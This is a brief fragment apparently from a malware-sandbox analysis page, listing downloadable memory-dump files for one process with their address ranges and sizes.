1.6MB

Download
memory/4880-175-0x00007FF981CD0000-0x00007FF981EC5000-memory.dmp

Filesize
2.0MB

Download
memory/4880-176-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4880-177-0x0000000000B00000-0x0000000004F17000-memory.dmp

Filesize
68.1MB

Download